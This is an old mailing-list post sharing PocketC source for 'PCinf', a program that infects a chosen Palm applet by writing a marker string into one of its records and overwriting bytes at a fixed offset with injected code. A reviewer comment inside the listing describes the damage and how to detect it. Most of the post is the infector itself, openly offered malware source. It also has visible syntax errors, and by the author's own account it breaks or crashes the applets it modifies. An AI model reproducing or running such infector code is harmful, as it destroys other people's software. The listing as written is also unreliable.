From: qobaiashi at gmx.net (qobaiashi@....net)
Subject: // playing pocketc

woops there was a typo in the code.. take this one:

// PCinf.c
/*
 this is a simple code infector for pocketc running on palm compatible hardware.
 it injects a string printing code. you can also use the launch() code and exec eg. "memo"..
 unpleasant side effects:
 *atm the applet gets "unusable" for its normal purpose :>
 *bigger applets crash due to this buggy "ret" thingie..
 by qobaiashi
*/

/*
 * Reviewer annotation (defensive reading of the listing below):
 * - The program prompts for an applet name, opens that database with
 *   dbopen() and changes it in place; nothing in this listing makes a copy
 *   or backup of the target first.
 * - Two writes are made: the "infected!" marker string is written at the
 *   position returned by dbsize() after dbrec(2) (presumably the end of
 *   record 2 -- confirm against the PocketC database API), and bytes are
 *   written starting at the fixed offset LOCATION (0x1d) in what the author
 *   labels the code infector section.
 * - Per the author's own notes above, a modified applet no longer works for
 *   its normal purpose and larger applets crash, so the change is
 *   destructive and readily noticeable rather than hidden.
 * - Detection and recovery: compare the applet database with a known-good
 *   copy (record 2 would be expected to be longer and to contain the marker
 *   string; bytes from offset 0x1d would differ) and reinstall the applet
 *   from a trusted source.
 */
#define LOCATION 0x1d

main() {
  string name, code[11] = {"\x03\x90\x05\x07\x28\x01 \x2c\x2b\x2f\x29\x00"};
  msg[12] = // 1st byte = strlen!
  {"\x0ainfected!\n\x00"};
  int dbcntr = 0, cntr, record, size, r2size;
  char patch;
  pointer ptr;

  // banner
  clear();
  puts(" ---PCinf--- \n");
  puts(" PocketC \n");
  puts(" infector \n");
  puts(" by qobaiashi\n\n");

  // the target applet name comes from interactive user input
  name = gets("Applet to infect:");
  if (strlen(name) == 0) {
    // empty input: print a message and call launch("PktC")
    puts("[!] i need a victim..\n");
    launch("PktC");
  }
  puts("[*] using applet: "+name+ "\n");

  // opening said database
  dbopen(name);

  //---string infector section---\\
  //write a string into #2
  // set record number:
  record = 2;
  dbrec(record);
  dbcntr = dbsize();
  r2size = dbcntr;// for patching..
  puts("using record "+record+"\n");
  puts("record size = "+dbcntr+"\n";

  // set offset in current record
  dbseek(dbcntr);
  puts("location is "+dbpos()+"\n\n");
  size = strlen(msg);
  ptr = msg+size;
  dbwritex(ptr, 'c');
  ptr = msg;
  dbwritex(ptr, 'ssize');

  //---code infector section---\\
  // set record number
  record = 0;
  dbcntr = dbsize();
  puts("using record "+record+"\n");
  puts("record size = "+dbcntr"\n");

  // set offset in current record
  dbseek(LOCATION);
  puts("location is "+dbpos()+"\n\n");

  // write out hostile code
  ptr = code;
  dbwritex(ptr, 'ssize');

  // patch 0x00 into code
  ptr = code + size;
  dbseek(LOCATION+1);
  dbwritex(ptr, 'c');

  // patch string offset in #2 into code
  dbseek(LOCATION+2);
  patch = r2size;
  dbwritex(&patch, 'c');

  dbclose();
  puts(" infection done!\n");
}

--
COMPUTERBILD 15/03: Premium-e-mail-Dienste im Test
--------------------------------------------------
1. GMX TopMail - Platz 1 und Testsieger!
2. GMX ProMail - Platz 2 und Preis-Qualit?tssieger!
3. Arcor - 4. web.de - 5. T-Online - 6. freenet.de - 7. daybyday - 8. e-Post